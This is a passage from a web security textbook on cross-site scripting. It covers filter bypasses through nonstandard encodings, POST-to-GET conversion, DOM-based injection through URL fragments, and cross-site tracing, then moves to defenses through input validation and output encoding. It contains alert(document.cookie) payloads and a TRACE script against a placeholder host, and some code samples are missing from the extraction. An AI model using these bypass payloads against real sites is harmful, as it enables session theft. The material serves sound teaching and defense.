POST to GET, move the message body into the URL query string (inserting

an additional

& if a query string is already present), and remove the Content-

Length

header. You can use the Change Request Method action in Burp Proxy

to perform these tasks for you.
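The manual conversion just described can be sketched in a few lines of JavaScript. This is an illustration only: postToGet is a hypothetical helper, it assumes CRLF line endings and a simple URL-encoded body, and it also drops the Content-Type header, which the steps above do not mention but which no longer describes anything once the body has gone.

```javascript
// Convert a raw HTTP POST request (as text) into an equivalent GET request.
// Hypothetical helper for illustration; handles only simple URL-encoded bodies.
function postToGet(rawRequest) {
  const [head, body = ""] = rawRequest.split("\r\n\r\n");
  const lines = head.split("\r\n");
  const [method, path, version] = lines[0].split(" ");
  if (method !== "POST") return rawRequest;

  // Move the body into the query string, adding "&" if one is already present.
  let newPath = path;
  if (body.length > 0) {
    newPath += (path.includes("?") ? "&" : "?") + body;
  }

  // Remove the headers that described the message body.
  const headers = lines.slice(1).filter((header) => {
    const name = header.split(":")[0].toLowerCase();
    return name !== "content-length" && name !== "content-type";
  });

  return [`GET ${newPath} ${version}`, ...headers].join("\r\n") + "\r\n\r\n";
}
```

Whether the application treats the resulting GET request in the same way as the original POST still has to be confirmed by sending it and reviewing the response.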

Test the new request, and if your XSS payload is still executed, then you can

simply use the URL from the

GET request as your attack vector. This makes fea-

sible a wider range of attack delivery mechanisms and, therefore, increases the

significance of the vulnerability in some contexts.

COMMON MYTH “This XSS bug isn’t exploitable. I can’t get my attack to

work as a GET request.”

If a reflected XSS flaw can only be exploited using the POST method, the

application is still vulnerable to various attack delivery mechanisms, including

ones that employ a malicious third-party web site.

In some situations, converting an attack that uses the GET method into one

that uses the

POST method may enable you to bypass certain filters. Many

applications perform some generic application-wide filtering of requests for


known attack strings. If an application expects to receive requests using the

GET method, it may perform this filtering on the URL query string only. By con-

verting a request to use the

POST method, you may be able to bypass this filter

entirely.

Using Nonstandard Content Encoding

In some situations, you can employ a very powerful means of bypassing many

types of filter, by causing the application to accept a nonstandard encoding of

your attack payload.

The following examples show some representations of the string

<script>alert(document.cookie)</script> in alternative encodings:

UTF-7:

+ADw-script+AD4-alert(document.cookie)+ADw-/script+AD4-

US-ASCII:

BC 73 63 72 69 70 74 BE 61 6C 65 72 74 28 64 6F ; ¼script¾alert(do

63 75 6D 65 6E 74 2E 63 6F 6F 6B 69 65 29 BC 2F ; cument.cookie)¼/

73 63 72 69 70 74 BE ; script¾

UTF-16:

FF FE 3C 00 73 00 63 00 72 00 69 00 70 00 74 00 ; ÿþ<.s.c.r.i.p.t.

3E 00 61 00 6C 00 65 00 72 00 74 00 28 00 64 00 ; >.a.l.e.r.t.(.d.

6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 2E 00 ; o.c.u.m.e.n.t...

63 00 6F 00 6F 00 6B 00 69 00 65 00 29 00 3C 00 ; c.o.o.k.i.e.).<.

2F 00 73 00 63 00 72 00 69 00 70 00 74 00 3E 00 ; /.s.c.r.i.p.t.>.

These encoded strings will bypass many common anti-XSS filters – the UTF-7

and US-ASCII encodings enable you to avoid the

< and > characters that are

often sanitized, and the UTF-16 encoding does not contain any common black-

list expressions such as

<script.

Today’s browsers will not by default automatically recognize nonstandard

encodings, and so the encoding type must be explicitly specified using the

charset attribute of the HTTP Content-Type header, or its corresponding

HTML meta tag. If you can control either of these locations, then you may be

able to use nonstandard encoding to bypass the application’s filters, and cause

the browser to interpret your payload in the way you require. In some appli-

cations, a

charset parameter is actually submitted in certain requests,

enabling you to directly set the encoding type specified in the application’s

response.


TIP One qualification to the point about auto-detection of content encoding

is that Internet Explorer tolerates null bytes appearing within HTML, and in

most cases simply ignores them. Provided that URL-encoded null bytes (%00)

get returned by the application as actual null bytes, you can often use UTF-16

encoding as an easy way of wrapping your XSS payloads in order to bypass

pattern-based filters, regardless of the Content-Type header being returned

by the server. For example, in the original reflected XSS vulnerability, the

following attack using a UTF-16 encoded payload is effective against Internet

Explorer:

https://wahh-app.com/error.php?message=%FF%FE%3C%00%73%00%63%00%72%00%69%00%70%00%74%00%3E%00%61%00%6C%00%65%00%72%00%74%00%28%00%64%00%6F%00%63%00%75%00%6D%00%65%00%6E%00%74%00%2E%00%63%00%6F%00%6F%00%6B%00%69%00%65%00%29%00%3C%00%2F%00%73%00%63%00%72%00%69%00%70%00%74%00%3E%00

Because Internet Explorer ignores the nulls, it effectively auto-decodes your

payload, causing the original attack to execute.
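The encoded forms shown in this section can be produced mechanically. The following sketch assumes a Node.js environment (it uses Buffer for base64), and both function names are hypothetical. The first builds a URL-encoded UTF-16 string with a leading FF FE byte-order mark; the second encodes a single character in the UTF-7 style used for the < and > characters above.

```javascript
// Percent-encode a string as little-endian UTF-16 with a leading FF FE marker.
function toUtf16LePercent(text) {
  const bytes = [0xff, 0xfe];
  for (let i = 0; i < text.length; i++) {
    const unit = text.charCodeAt(i); // one UTF-16 code unit
    bytes.push(unit & 0xff, unit >> 8); // little-endian: low byte first
  }
  return bytes
    .map((b) => "%" + b.toString(16).toUpperCase().padStart(2, "0"))
    .join("");
}

// Encode one character UTF-7 style: "+", the big-endian UTF-16 bytes in
// base64 with the padding removed, then "-".
function toUtf7Char(ch) {
  const unit = ch.charCodeAt(0);
  const b64 = Buffer.from([unit >> 8, unit & 0xff]).toString("base64");
  return "+" + b64.replace(/=+$/, "") + "-";
}

console.log(toUtf16LePercent("<s")); // %FF%FE%3C%00%73%00
console.log(toUtf7Char("<"), toUtf7Char(">")); // +ADw- +AD4-
```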

Finding and Exploiting Stored XSS Vulnerabilities

The process of identifying stored XSS vulnerabilities overlaps substantially

with that described for reflected XSS, and includes submitting a unique string

as every parameter to every page. However, there are some important differ-

ences which you must keep in mind to maximize the number of vulnerabilities

identified.

HACK STEPS

■ Having submitted a unique string to every possible location within the

application, it is necessary to review the entire content and functionality

of the application once more to identify any instances where this string

is displayed back to the browser. User-controllable data entered in one

location (for example, a name field on a personal information page) may

be displayed in numerous different places throughout the application

(for example, on the user’s home page, in a listing of registered users, in

workflow items such as tasks, on other users’ contact lists, in messages

or questions posted by the user, in application logs, etc). Each appear-

ance of the string may be subject to different protective filters, and so

needs to be investigated separately.


■ If possible, all areas of the application accessible by administrators

should be reviewed to identify the appearance of any data controllable

by non-administrative users. For example, the application may allow

administrators to review log files in-browser. It is extremely common for

this type of functionality to contain XSS vulnerabilities that an attacker

can exploit by generating log entries containing malicious HTML.

■ When submitting a test string to each location within the application, it is

not always sufficient simply to post it as each parameter to each page.

Many application functions need to be followed through several stages

before the submitted data is actually stored. For example, actions like

registering a new user, placing a shopping order, and making a funds

transfer often involve submitting several different requests in a defined

sequence. To avoid missing any vulnerabilities, it is necessary to see each

test case through to completion.

■ When probing for reflected XSS, you are interested in every aspect of a

victim’s request that you can control. This includes all parameters to the

request, and also every HTTP header, because these can be controlled

using a crafted Flash object. In the case of stored XSS, you should also

investigate any out-of-band channels through which the application

receives and processes input that you can control. Any such channels

are suitable attack vectors for introducing stored XSS attacks. Review the

output of your application mapping exercises (see Chapter 4) to identify

every possible area of attack surface.

■ If the application allows files to be uploaded and downloaded, always

probe this functionality for stored XSS attacks. If the application allows

HTML or text files, and does not validate or sanitize their contents, then

it is almost certainly vulnerable. If it allows JPEG files and does not vali-

date that they contain valid images, then it is probably vulnerable to

attacks against Internet Explorer users. Test the application’s handling of

each file type that it supports, and confirm how browsers handle

responses containing HTML instead of the normal content type.

■ Think imaginatively about any other possible means by which data you

control may be stored by the application and displayed to other users.

For example, if the application search function shows a list of popular

search items, you may be able to introduce a stored XSS payload by

searching for it numerous times, even though the primary search func-

tionality itself handles your input safely.

When you have identified every instance in which user-controllable data is

stored by the application and later displayed back to the browser, you should fol-

low the same process described previously for investigating potential reflected

XSS vulnerabilities — that is, determine what input needs to be submitted to


embed valid JavaScript within the surrounding HTML and then attempt to cir-

cumvent any filters which interfere with the processing of your attack

payload.

TIP When probing for reflected XSS, it is trivial to identify which request

parameters are potentially vulnerable, by testing one parameter at a time and

reviewing each response for any appearance of your input. With stored XSS,

however, this may be less straightforward. If you submit the same test string as

every parameter to every page, then you may find this string reappearing at

multiple locations within the application, and it may not be clear from the

context precisely which parameter is responsible for the appearance. To avoid

this problem, you can submit a different test string as every parameter when

probing for stored XSS flaws — for example, by concatenating your unique

string with the name of the field it is being submitted to.
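One way of generating distinct test strings is sketched below. The function names, the base string, and the trailing "Z" terminator are all arbitrary choices made for illustration; the terminator reduces the chance that the marker for one field (such as name) is also matched inside the marker for another (such as name2).

```javascript
// Build a distinct probe value for each field by combining a unique base
// string with the page path and field name.
function buildProbes(baseMarker, page, fieldNames) {
  const probes = {};
  for (const name of fieldNames) {
    // Keep to alphanumerics so the marker is likely to pass filters intact.
    const tag = (page + name).replace(/[^A-Za-z0-9]/g, "");
    probes[name] = baseMarker + tag + "Z";
  }
  return probes;
}

// Report which fields' probes appear in a given response body.
function findStoredFields(probes, responseBody) {
  return Object.keys(probes).filter((name) =>
    responseBody.includes(probes[name])
  );
}
```

Having submitted the values returned by buildProbes, you can pass each page of the application to findStoredFields to see exactly which field was responsible for each appearance.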

Finding and Exploiting DOM-Based XSS Vulnerabilities

DOM-based XSS vulnerabilities cannot be identified by submitting a unique

string as each parameter and monitoring responses for the appearance of that

string.

One basic method for identifying DOM-based XSS bugs is to manually walk

through the application with your browser, and modify each URL parameter

to contain a standard test string such as the following:

"<script>alert(document.cookie)</script>

By actually displaying each returned page in your browser, you will cause

all client-side scripts to execute, referencing your modified URL parameter

where applicable. Any time a dialog box appears containing your cookies, you

will have found a vulnerability (which may be either DOM-based or standard

reflected XSS). This process could even be automated by a tool which imple-

mented its own JavaScript interpreter.

However, this basic approach will not identify all DOM-based XSS bugs. As

you have already seen, the precise syntax required to inject valid JavaScript

into an HTML document depends upon the syntax that already appears before

and after the point where the user-controllable string gets inserted. It may be

necessary to terminate a single- or double-quoted string or to close specific

tags. Sometimes, new tags may be required, but sometimes not. The applica-

tion may modify your input in various ways and yet may still be vulnerable.

If the standard test string does not happen to result in valid syntax when it

is processed and inserted, then the embedded JavaScript will not execute and

so no dialog will appear, even though the application may be vulnerable to a


properly crafted attack. Short of submitting every conceivable XSS attack

string into every parameter, the basic approach will inevitably miss a large

number of vulnerabilities.

A more effective approach to identifying DOM-based XSS bugs is to review

all client-side JavaScript for any use of DOM properties that may lead to a

vulnerability.

HACK STEPS

Using the results of your application mapping exercises (see Chapter 4), review

every piece of client-side JavaScript for the following APIs, which may be used

to access DOM data that is controllable via a crafted URL:

■ document.location

■ document.URL

■ document.URLUnencoded

■ document.referrer

■ window.location

Be sure to include scripts that appear in static HTML pages as well as

dynamically generated pages — DOM-based XSS bugs may exist in any location

where client-side scripts are used, regardless of the type of page or whether

you see parameters being submitted to the page.

In every instance where one of the preceding APIs is being used, closely

review the code to identify what is being done with the user-controllable data,

and whether crafted input could be used to cause execution of arbitrary

JavaScript. In particular, review and test any instance where your data is being

passed to any of the following APIs:

■ document.write()

■ document.writeln()

■ document.body.innerHTML

■ eval()

■ window.execScript()

■ window.setInterval()

■ window.setTimeout()
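A first pass over a large body of client-side code can be partly automated. The following is a rough sketch only: scanScript is a hypothetical helper that performs simple substring matching on each line, so it will both over-report and miss aliased or obfuscated uses, and every hit still needs manual review.

```javascript
// DOM properties that may carry data controllable via a crafted URL.
const SOURCES = [
  "document.location",
  "document.URL",
  "document.URLUnencoded",
  "document.referrer",
  "window.location",
];

// APIs that can execute or render data passed to them.
const SINKS = [
  "document.write(",
  "document.writeln(",
  "innerHTML",
  "eval(",
  "execScript(",
  "setInterval(",
  "setTimeout(",
];

// Return one finding per matching API per line of the supplied script text.
function scanScript(source) {
  const findings = [];
  source.split("\n").forEach((line, index) => {
    for (const api of SOURCES) {
      if (line.includes(api)) findings.push({ line: index + 1, kind: "source", api });
    }
    for (const api of SINKS) {
      if (line.includes(api)) findings.push({ line: index + 1, kind: "sink", api });
    }
  });
  return findings;
}
```

Scripts in which a source and a sink both appear are the most promising candidates for closer inspection.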

As with reflected and stored XSS, you may find that the application imple-

ments filters that block requests containing certain malicious strings. Even

though the vulnerable operation occurs on the client, and the server does not


return the user-supplied data in its response, the URL is still submitted to the

server, and so the application may validate the data and fail to return the vul-

nerable client-side script when a malicious payload is detected.

If this defense is encountered, you should attempt each of the potential fil-

ter bypasses that were described previously for reflected XSS vulnerabilities,

to test the robustness of the server’s validation. In addition to these attacks,

there are several techniques unique to DOM-based XSS bugs that may enable

your attack payload to evade server-side validation.

When client-side scripts extract a parameter’s value from the URL, they

very rarely parse the query string properly into name/value pairs. Instead,

they typically search the URL for the parameter name followed by the

= sign,

and then extract whatever comes next, up until the end of the URL. This

behavior can be exploited in two ways:

■ If the server’s validation logic is being applied on a per-parameter

basis, rather than on the entire URL, then the payload can be placed

into an invented parameter appended after the vulnerable parameter.

For example:

https://wahh-app.com/error.php?message=Sorry%2c+an+error+occurred&foo=<script>alert(document.cookie)</script>

Here, the invented parameter is ignored by the server and so is not sub-

ject to any filtering. However, because the client-side script searches the

query string for

message= and extracts everything following this, it will

include your payload in the string which it processes.

■ If the server’s validation logic is being applied to the entire URL, and

not just to the message parameter, it may still be possible to evade the

filter by placing the payload to the right of the HTML fragment character #. For example:

https://wahh-app.com/error.php?message=Sorry%2c+an+error+occurred#<script>alert(document.cookie)</script>

Here, the fragment string is still part of the URL, and so is stored in the

DOM and will be processed by the vulnerable client-side script. How-

ever, because browsers do not submit the fragment portion of the URL

to the server, the attack string will not even be sent to the server, and so

cannot be blocked by any kind of server-side filter. Because the client-

side script extracts everything after

message=, the payload is still copied

into the HTML page source.
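The behavior exploited by both attacks can be modeled in a few lines. In this sketch, naiveExtract is a hypothetical stand-in for the kind of client-side parsing described above, and sentToServer approximates the portion of the URL that the browser actually transmits; neither is taken from any real application.

```javascript
// Model of naive client-side parsing: find "name=" and take everything
// that follows, up to the end of the URL.
function naiveExtract(url, name) {
  const marker = name + "=";
  const start = url.indexOf(marker);
  if (start === -1) return null;
  return url.substring(start + marker.length);
}

// The fragment is never transmitted, so the server sees only this much.
function sentToServer(url) {
  return url.split("#")[0];
}

const viaParameter =
  "https://wahh-app.com/error.php?message=Sorry%2c+an+error+occurred&foo=<script>alert(document.cookie)</script>";
const viaFragment =
  "https://wahh-app.com/error.php?message=Sorry%2c+an+error+occurred#<script>alert(document.cookie)</script>";

// Both extracted values contain the payload ...
console.log(naiveExtract(viaParameter, "message"));
console.log(naiveExtract(viaFragment, "message"));
// ... but in the second case the server never receives it.
console.log(sentToServer(viaFragment));
```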


COMMON MYTH “We check every user request for embedded script tags,

so no XSS attacks are possible.”

Aside from the question of whether any filter bypasses are possible, you have

now seen three reasons why this claim can be incorrect:

■ In some XSS flaws, the attacker-controllable data is being inserted

directly into an existing JavaScript context, and so there is no need to

use either script tags or the javascript: protocol. In other cases, you

can inject an event handler containing JavaScript without using any

script tags.

■ If an application receives data via some out-of-band channel and

renders this within its web interface, then any stored XSS bugs can be

exploited without submitting any malicious payload using HTTP.

■ Attacks against DOM-based XSS may not involve submitting any

malicious payload to the server. If the fragment technique is used, the

payload remains on the client at all times.

Some applications employ a more sophisticated client-side script that per-

forms stricter parsing of the query string — for example, it may search the

URL for the parameter name followed by the

= sign, but then extract what fol-

lows only until it reaches a relevant delimiter such as

& or #. In this case, the

two attacks described previously could be modified as follows:

https://wahh-app.com/error.php?foomessage=<script>alert(document.cookie)</script>&message=Sorry%2c+an+error+occurred

https://wahh-app.com/error.php#message=<script>alert(document.cookie)</script>

In both cases, the first match for message= is followed immediately by the

attack string, without any intervening delimiter, and so the payload is

processed and copied into the HTML page source.
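The following sketch models the stricter parsing just described and shows why it is still defeated. delimitedExtract is a hypothetical reconstruction of such a script. For contrast, exactParam uses the standard URL and URLSearchParams APIs to parse the query string into name/value pairs, which is an assumption about how a more careful script might be written rather than anything described in this chapter.

```javascript
// Model of the "stricter" parser: find the first "name=" anywhere in the
// URL, then stop at the next & or # delimiter.
function delimitedExtract(url, name) {
  const marker = name + "=";
  const start = url.indexOf(marker);
  if (start === -1) return null;
  const rest = url.substring(start + marker.length);
  const end = rest.search(/[&#]/);
  return end === -1 ? rest : rest.substring(0, end);
}

// Parse the query string properly and look up the exact parameter name.
function exactParam(url, name) {
  return new URL(url).searchParams.get(name);
}

const prefixed =
  "https://wahh-app.com/error.php?foomessage=<script>alert(document.cookie)</script>&message=Sorry%2c+an+error+occurred";
const inFragment =
  "https://wahh-app.com/error.php#message=<script>alert(document.cookie)</script>";

console.log(delimitedExtract(prefixed, "message")); // the payload
console.log(delimitedExtract(inFragment, "message")); // the payload
console.log(exactParam(prefixed, "message")); // Sorry, an error occurred
console.log(exactParam(inFragment, "message")); // null
```

Even when a script parses the query string correctly, the extracted value remains attacker-controllable and must still be handled safely before it is written into the page.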

In some cases, you may find that very complex processing is performed on

DOM-based data, and it is difficult to trace all of the different paths taken by

user-controllable data, and all of the manipulation being performed, solely

through static review of the JavaScript source code. In this situation, it can be

very beneficial to use a JavaScript debugger to monitor the script’s execution

dynamically. The Firebug extension to the Firefox browser is a full-fledged

debugger for client-side code and content, which enables you to set break-

points and watches on interesting code and data, making the task of under-

standing a complex script considerably easier.


COMMON MYTH “We’re safe. Our web application scanner didn’t find any

XSS bugs.”

As you will see in Chapter 19, some web application scanners do a reasonable

job of finding common flaws, including XSS. However, it should be evident at

this point that many XSS vulnerabilities are subtle to detect, and creating a

working exploit can require extensive probing and experimentation. At the

present time, no automated tools are capable of reliably identifying all of

these bugs.

HttpOnly Cookies and Cross-Site Tracing

As you have seen, one of the various payloads for attacking XSS vulnerabili-

ties is to capture a victim’s session token by using injected JavaScript to access

the

document.cookie property. HttpOnly cookies are a defense mechanism

supported by some browsers and employed by some applications in an

attempt to prevent this attack payload from succeeding.

When an application sets a cookie, it can be flagged as

HttpOnly in the

Set-Cookie header:

Set-Cookie: SessId=12d1a1f856ef224ab424c2454208ff; HttpOnly;

When a cookie is flagged in this way, supporting browsers will prevent

client-side JavaScript from directly accessing the cookie. Although the browser

will still submit the cookie in the HTTP headers of requests, it will not be

included in the string returned by

document.cookie. Hence, using HttpOnly

cookies can help to prevent an attacker from using XSS flaws to perform ses-

sion hijacking attacks.

NOTE HttpOnly cookies have no effect on any of the various other attack

payloads that XSS flaws can be used to deliver. For example, the attack of

inducing compromised users to perform an arbitrary action, as employed in the

MySpace worm, is unaffected. Not all browsers support HttpOnly cookies,

meaning that they cannot always be relied upon to be effective. Further, as

described next, in some circumstances session hijacking is still possible even

when HttpOnly cookies are used.

Cross-site tracing (or XST) is an attack technique that in some circumstances

can bypass the protection offered by

HttpOnly cookies, and enable client-side

JavaScript to gain access to the values of cookies flagged as

HttpOnly.

The technique uses the HTTP

TRACE method, which is designed for diagnos-

tic purposes and is enabled on many web servers by default. When a server

receives a request using the

TRACE method, the defined behavior is for it to


respond with a message whose body contains the exact text of the TRACE

request that the server received. The reason that this is sometimes of value for

diagnostic purposes is that the request received by a server can be different

from the request sent by a client, because of modifications made by interven-

ing proxies, and so on. The method can be used to determine what changes are

being made to the request between client and server.

Browsers submit all cookies in HTTP requests, including requests that use

the

TRACE method, and including cookies flagged as HttpOnly. For example:

TRACE / HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, */*

Accept-Language: en-gb,en-us;q=0.5

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)

Host: wahh-app.com

Cookie: SessId=12d1a1f856ef224ab424c2454208ff

HTTP/1.1 200 OK

Date: Thu, 01 Feb 2007 10:59:54 GMT

Server: Apache

Content-Type: message/http

Content-Length: 426

TRACE / HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, */*

Accept-Language: en-gb,en-us;q=0.5

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)

Host: wahh-app.com

Cookie: SessId=12d1a1f856ef224ab424c2454208ff

As you can see, both the request and response contain the cookie that was

flagged as

HttpOnly, and this behavior is what opens the door to XST attacks.

If client-side JavaScript can be used to issue a

TRACE request, and read the

response to that request, then the script will be able to access cookies that are

flagged as

HttpOnly, even though these are not accessible via the

document.cookie property. Of course, the attack will also depend upon some

kind of XSS vulnerability, in order to inject the malicious JavaScript. What the

technique demonstrates is how an attacker who has identified an exploitable

XSS flaw can leverage the

TRACE method to gain access to cookies that are sup-

posed to be unavailable to it. Hence the name of the technique: cross-site

tracing.

In older browsers, XST attacks could be delivered using the

XMLHttpRequest

object that is employed in Ajax applications. For example, in older versions of


Internet Explorer, the following script will make a TRACE request and display

the response in a dialog, including any cookies submitted in the request:

<script>
var request = new ActiveXObject("Microsoft.XMLHTTP");
request.open("TRACE", "https://wahh-app.com", false);
request.send();
alert(request.responseText);
</script>

Current browsers block TRACE requests using the XMLHttpRequest object,

and XST attacks are no longer viable at the time of this writing.

Preventing XSS Attacks

Despite the various different manifestations of XSS, and the different possibil-

ities for exploitation, preventing the vulnerability itself is in fact conceptually

straightforward. What makes it problematic in practice is the difficulty of iden-

tifying every instance in which user-controllable data is handled in a poten-

tially dangerous way. Any given page of an application may process and

display dozens of items of user data. In addition to the core functionality, there

are error messages and other locations in which vulnerabilities may arise. It is

hardly surprising, therefore, that XSS flaws are so hugely prevalent, even in

the most security-critical applications.

Different types of defense are applicable to reflected and stored XSS on the

one hand, and to DOM-based XSS on the other, because of their different root

causes.

Preventing Reflected and Stored XSS

The root cause of both reflected and stored XSS is that user-controllable data is

copied into application responses without adequate validation and sanitiza-

tion. Because the data is being inserted into the raw source code of an HTML

page, malicious data can interfere with that page, modifying not only its con-

tent but also its structure — breaking out of quoted strings, opening and clos-

ing tags, injecting scripts, and so on.

To eliminate reflected and stored XSS vulnerabilities, the first step is to

identify every instance within the application where user-controllable data is

being copied into responses. This includes data that is copied from the imme-

diate request and also any stored data that originated from any user at any

prior time, including via out-of-band channels. To ensure that every instance

is identified, there is no real substitute for a close review of all application

source code.


Having identified all of the operations which are potentially at risk of XSS

and which need to be suitably defended, a threefold approach should be taken

to prevent any actual vulnerabilities arising. This approach comprises the fol-

lowing elements:

■ Validate input.

■ Validate output.

■ Eliminate dangerous insertion points.

Validate Input

At the point where the application receives user-supplied data that may be

copied into one of its responses at any future point, the application should per-

form context-dependent validation of this data, in as strict a manner as possi-

ble. Potential features to validate include the following:

■ That the data is not too long.

■ That the data only contains a certain permitted set of characters.

■ That the data matches a particular regular expression.

Different validation rules should be applied as restrictively as possible to

names, email addresses, account numbers, and so on, according to the type of

data that the application is expecting to receive in each field.
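The three checks listed above can be combined into a single per-field rule. The sketch below is illustrative only: the field names, length limits, and patterns are assumptions chosen for the example, and a real application would derive them from its own data requirements.

```javascript
// Hypothetical validation rules, one per expected field.
const FIELD_RULES = {
  name: { maxLength: 50, pattern: /^[A-Za-z][A-Za-z .'-]*$/ },
  email: {
    maxLength: 254,
    pattern: /^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$/,
  },
  accountNumber: { maxLength: 10, pattern: /^[0-9]{6,10}$/ },
};

// Accept a value only if its field is known, it is not too long, and it
// matches the permitted pattern for that field.
function validateField(field, value) {
  if (!Object.prototype.hasOwnProperty.call(FIELD_RULES, field)) return false;
  if (typeof value !== "string") return false;
  const rule = FIELD_RULES[field];
  if (value.length > rule.maxLength) return false;
  return rule.pattern.test(value);
}
```

Note that the name rule has to permit the apostrophe to accommodate names such as O'Neil. Legitimate data often contains characters that are useful to an attacker, which is one reason why input validation alone cannot be relied upon.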

Validate Output

At the point where the application copies into its responses any item of data

that originated from some user or third party, this data should be HTML-

encoded to sanitize potentially malicious characters. HTML-encoding

involves replacing literal characters with their corresponding HTML entities.

This ensures that browsers will handle potentially malicious characters in a

safe way, treating them as part of the content of the HTML document and not

part of its structure. The HTML-encodings of the primary problematic charac-

ters are as follows:

" &quot;

' &apos;

& &amp;

< &lt;

> &gt;

In addition to these common encodings, in fact any character can be HTML-

encoded using its numeric ASCII character code, as follows:

% &#37;

* &#42;


ASP applications can use the Server.HTMLEncode API to sanitize common

malicious characters within a user-controllable string, before this is copied into

the server’s response. This API converts the characters

" & < and > to their corresponding HTML entities, and also converts any character above 0x7f

using the numeric form of encoding.

On the Java platform, there is no equivalent built-in API available; however,

it is simple to construct your own equivalent method using just the numeric

form of encoding. For example:

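public static String HTMLEncode(String s)
{
    // Build the encoded output one character at a time.
    StringBuilder out = new StringBuilder();
    for (int i = 0; i < s.length(); i++)
    {
        char c = s.charAt(i);
        // Numerically encode non-ASCII characters and the characters " & < >
        if (c > 0x7f || c == '"' || c == '&' || c == '<' || c == '>')
            out.append("&#").append((int) c).append(";");
        else
            out.append(c);
    }
    return out.toString();
}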

A common mistake made by developers is to HTML-encode only the char-

acters that immediately appear to be of use to an attacker in the specific con-

text. For example, if an item is being inserted into a double-quoted string, the

application might encode only the

" character; if the item is being inserted

unquoted into a tag, it might encode only the

> character. This approach con-

siderably increases the risk of bypasses being found. As you have seen, an

attacker can often exploit browsers’ tolerance of invalid HTML and JavaScript

to change context or inject code in unexpected ways. Further, it is often possi-

ble to span an attack across multiple controllable fields, exploiting the differ-

ent filtering being employed in each one. A far more robust approach is to

always HTML-encode every character that may be of potential use to an

attacker, regardless of the context where it is being inserted. To provide the

highest possible level of assurance, developers may elect to HTML-encode

every non-alphanumeric character, including whitespace. This approach nor-

mally imposes no measurable overhead on the application, and presents a

severe obstacle to any kind of filter bypass attack.
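The stricter policy of encoding every non-alphanumeric character can be sketched as follows. The function name htmlEncodeStrict is hypothetical, and the example iterates over code points rather than UTF-16 code units so that characters outside the basic multilingual plane receive a single valid numeric reference.

```javascript
// HTML-encode every character that is not an ASCII letter or digit,
// including whitespace, using the numeric form of encoding.
function htmlEncodeStrict(text) {
  let out = "";
  for (const ch of text) { // iterates by code point
    if (/^[A-Za-z0-9]$/.test(ch)) {
      out += ch;
    } else {
      out += "&#" + ch.codePointAt(0) + ";";
    }
  }
  return out;
}

console.log(htmlEncodeStrict('<a b="1">'));
// &#60;a&#32;b&#61;&#34;1&#34;&#62;
```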

The reason for combining input validation and output sanitization is that this

involves two layers of defenses, either one of which will provide some protec-

tion if the other one fails. As you have seen, many filters which perform input

and output validation are subject to bypasses. By employing both techniques,

the application gains some additional assurance that an attacker will be defeated

even if one of its two filters is found to be defective. Of the two defenses, the output

validation is the more important and is absolutely mandatory. Performing

strict input validation should be viewed as a secondary failover.


Of course, when devising the input and output validation logic itself, great

care should be taken to avoid any vulnerabilities that lead to bypasses. In par-

ticular, filtering and encoding should be carried out after any relevant canoni-

calization, and the data should not be further canonicalized afterwards. The

application should also ensure that the presence of any null bytes does not

interfere with its validation.
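The ordering described here can be illustrated with a short sketch. It assumes that URL-decoding is the only canonicalization the application performs, and sanitizeForOutput is a hypothetical name; the point is simply that decoding happens first, null bytes are rejected outright, and the encoded result is not decoded again afterwards.

```javascript
// Canonicalize first, then validate, then encode. Returns null if the
// input is rejected.
function sanitizeForOutput(rawParam) {
  let value;
  try {
    // Step 1: canonicalize (URL-decode) before any filtering takes place.
    value = decodeURIComponent(rawParam.replace(/\+/g, " "));
  } catch (e) {
    return null; // malformed encoding is rejected rather than guessed at
  }

  // Step 2: refuse input containing null bytes instead of filtering around them.
  if (value.includes("\0")) return null;

  // Step 3: encode for output. No further decoding is performed after this.
  return value.replace(/[^A-Za-z0-9]/gu, (ch) => "&#" + ch.codePointAt(0) + ";");
}

console.log(sanitizeForOutput("%3Cscript%3E")); // &#60;script&#62;
console.log(sanitizeForOutput("abc%00def")); // null
```

Had the encoding step been applied to the raw value %3Cscript%3E before decoding, it would have found no angle brackets to neutralize, and the later decoding would have reintroduced them.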

Eliminate Dangerous Insertion Points

There are some locations within the application page where it is just too inher-

ently dangerous to insert user-supplied input, and developers should look for

an alternative means of implementing the desired functionality.

Inserting user-controllable data directly into existing JavaScript should be

avoided wherever possible. When applications attempt to do this safely, it is

frequently possible to bypass their defensive filters. And once an attacker has

taken control of the context of the data he controls, he typically needs to per-

form minimal work to inject arbitrary script commands and so perform mali-

cious actions.

A second location where user input should not be inserted is any other con-

text in which JavaScript commands may appear directly. For example:

In these situations, an attacker can proceed directly to injecting JavaScript

commands within the quoted string. Further, the defense of HTML-encoding

the user data may not be effective, because some browsers will HTML-decode

the contents of the quoted string before this is processed. For example:

A further pitfall to avoid is situations where an attacker can manipulate the

encoding type of the application’s response, either by injecting into a relevant

directive or because the application uses a request parameter to specify the

preferred encoding type. In this situation, input and output filters that are well

designed in other respects may fail because the attacker’s input is encoded in

an unusual form that the filters do not recognize as potentially malicious.

Wherever possible, the application should explicitly specify an encoding type

in its response headers, disallow any means of modifying this, and ensure that

its XSS filters are compatible with it. For example:

Content-Type: text/html; charset=ISO-8859-1


Preventing DOM-Based XSS

The defenses described so far obviously do not apply directly to DOM-based

XSS, because the vulnerability does not involve user-controlled data being

copied into server responses.

Wherever possible, applications should avoid using client-side scripts to

process DOM data and insert it into the page. Because the data being

processed is outside of the server’s direct control, and in some cases even out-

side of its visibility, this behavior is inherently risky.

If it is considered unavoidable to use client-side scripts in this way, DOM-

based XSS flaws can be prevented through two types of defenses, correspond-

ing to the input and output validation described for reflected XSS.

Validate Input

In many situations, applications can perform rigorous validation on the data

being processed. Indeed, this is one area where client-side validation can be

more effective than server-side validation. In the vulnerable example

described earlier, the attack can be prevented by validating that the data about

to be inserted into the document only contains alphanumeric characters and

whitespace. For example:

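<script>
// Extract the value of the message parameter from the URL
var a = document.URL;
a = a.substring(a.indexOf("message=") + 8, a.length);
a = unescape(a);
// Write the value only if it contains alphanumerics, "+", and whitespace
var regex=/^([A-Za-z0-9+\s])*$/;
if (regex.test(a))
    document.write(a);
</script>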

In addition to this client-side control, rigorous server-side validation of URL

